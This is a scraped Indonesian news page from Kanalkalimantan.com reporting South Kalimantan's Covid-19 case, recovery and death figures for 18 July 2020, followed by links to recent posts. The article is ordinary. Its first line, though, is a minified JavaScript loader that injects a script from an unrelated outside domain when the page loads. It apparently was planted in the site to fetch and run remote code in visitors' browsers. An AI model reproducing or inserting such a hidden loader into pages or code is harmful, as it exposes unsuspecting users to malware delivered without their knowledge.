(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Categories: Kalimantan Selatan

Covid-19 di Kalsel Tembus 4.829 Kasus, Banjarbaru Hari Ini Sumbang 36 Kasus Baru


KANALKALIMANTAN.COM, BANJARMASIN – Kasus positif Covid-19 di Kalimantan Selatan masih terus bertambah. Sabtu (18/7/2020) jumlah pasien positif mencapai 4.829 kasus.

“Penambahan kasus positif Covid-19 hari ini sebanyak 107 orang,” beber Juru Bicara Gugus Tugas Percepatan Penanganan (GTPP) Covid-19 Kalsel Muhamad Muslim di Banjarbaru, Sabtu (18/7/2020) sore.

Penambahan kasus baru ini didominasi dari Kota Banjarbaru sebanyak 36 orang. Disusul dari Kabupaten banjar sebanyak 17 orang, Kabupaten Kotabaru 16 orang, Kota Banjarmasin 15 orang, Kabupaten Hulu Sungai Selatan 10 orang, Kabupaten Tanah Bumbu 8 orang dan Kabupaten Tabalong 5 orang.

Namun begitu, kasus sembuh dari Covid-19 juga bertambah. Di hari sebelumnya, Jumat (17/7/2020) tercatat sebanyak 1.660 orang, maka pada Sabtu (18/7/2020) kembali bertambah mencapai 1.708 orang, atau ada 48 kasus baru yang sembuh.

Kasus sembuh pada hari ini, didominasi dari pasien di RSUD Abdul Aziz Marabahan sebanyak 12 orang dan karantina khusus di Bapelkes Kalsel di Banjarbaru sebanyak 11 orang. Disusul dari karantina Asrama Haji Banjarbaru 8 orang, karantina di Hulu Sungai Selatan sebanyak 7 orang, karantina di Kotabaru sebanyak 4 orang, karantina di Hulu Sungai Tengah sebanyak 3 orang, isolasi mandiri di Barito Kuala sebanyak 2 orang dan satu orang dari perawatan di RSUD Ulin Banjarmasin.

Kasus kematian akibat Covid-19 juga bertambah. Di hari Jumat (17/7/2020) tercatat ada 238 kasus positif Covid-19 yang meninggal dunia, dan pada Sabtu (18/7/2020) bertambah menjadi 243 kasus.
“Pasien Covid-19 yang dilaporkan meninggal dunia sebanyak 5 orang. Berasal dari Kotabaru 2 orang, Banjar 1 orang dan Hulu Sungai Tengah 1 orang,” pungkas Muslim. (Kanalkalimantan.com/fikri)

Reporter : Fikri
Editor : Cell


Desy Arfianty

Recent Posts

Cek Pelayanan Kesehatan Berjalan Optimal, Bupati Wiyatno Audiensi ke RSUD Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Bupati Kapuas H Muhammad Wiyatno melakukan kunjungan kerja sekaligus audiensi dengan… Read More

2 jam ago

67 Ribu Warga Tak Lagi Ditanggung BPJS Kesehatan, Pemko Banjarmasin Upayakan Pengaktifan Kembali

KANALKALIMANTAN.COM, BANJARMASIN — Masyarakat di Kota Banjarmasin sangat terpukul dengan kebijakan penonaktifan massal kepesertaan BPJS… Read More

18 jam ago

Janji Wali Kota Yamin Tertibkan Bangunan di Atas Sungai

KANALKALIMANTAN.COM, BANJARMASIN — Wali Kota Banjarmasin, H Muhammad Yamin HR menyoroti bangunan yang berdiri di… Read More

20 jam ago

MAFINDO Kalsel Bekali Guru di Banjarmasin Memahami Teknologi Kecerdasan Buatan

KANALKALIMANTAN.COM, BANJARMASIN - Membuka tahun 2026, Masyarakat Anti Fitnah Indonesia (MAFINDO) Kalimantan Selatan (Kalsel) menggelar… Read More

20 jam ago

Pengelolaan UNESCO Global Geopark Meratus Diperkuat

Saat ini Ada 17 Situs Geologi Utama, 50 Titik Potensial Masih Dikaji Read More

1 hari ago

Mereka Menanti Skatepark di Kota Seribu Sungai

KANALKALIMANTAN.COM, BANJARMASIN – Sudah lama para skater menanti kehadiran skatepark di Kota Banjarmasin. Pasalnya, Siring… Read More

1 hari ago

This website uses cookies.